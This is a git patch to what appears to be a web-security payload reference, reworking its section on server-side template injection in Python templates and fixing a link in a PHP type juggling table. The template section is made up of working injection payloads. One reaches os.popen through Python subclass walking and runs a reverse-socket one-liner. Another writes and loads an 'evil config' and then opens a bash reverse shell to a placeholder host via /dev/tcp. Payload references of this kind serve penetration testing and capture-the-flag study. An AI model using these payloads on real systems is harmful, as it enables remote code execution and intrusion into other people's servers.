From 504caa3b508214333ebb221be519bf2a4f98810e Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Wed, 10 Jul 2019 21:31:44 +0200
Subject: [PATCH] SSTI by calling Popen without guessing the offset

---
 Server Side Template Injection/README.md | 21 ++++++++++++++++-----
 Type Juggling/README.md                  |  2 +-
 2 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 9c95d16..d8fba0f 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -254,19 +254,30 @@ Listen for connexion
 nv -lnvp 8000
 ```
 
-Exploit the SSTI by calling subprocess.Popen.
+#### Exploit the SSTI by calling subprocess.Popen.
 :warning: the number 396 will vary depending of the application.
 
 ```python
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 ```
 
-Exploit the SSTI by writing an evil file.
+#### Exploit the SSTI by calling Popen without guessing the offset
 
 ```python
-{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
-{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
-{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+```
+
+#### Exploit the SSTI by writing an evil config file.
+
+```python
+# evil config
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} 
+
+# load the evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  
+
+# connect to evil host
+{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} 
 ```
 
 
diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 95c4cea..835e60a 100644
--- a/Type Juggling/README.md	
+++ b/Type Juggling/README.md	
@@ -46,7 +46,7 @@ If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
 | MD5  | 240610708                  | 0e462097431906509019562988736854              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
 | SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
-| SHA-224 | 10885164793773          | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/113807522401083392)1 |
+| SHA-224 | 10885164793773          | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
 | SHA-256 | 34250003024812          | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
 
 ```php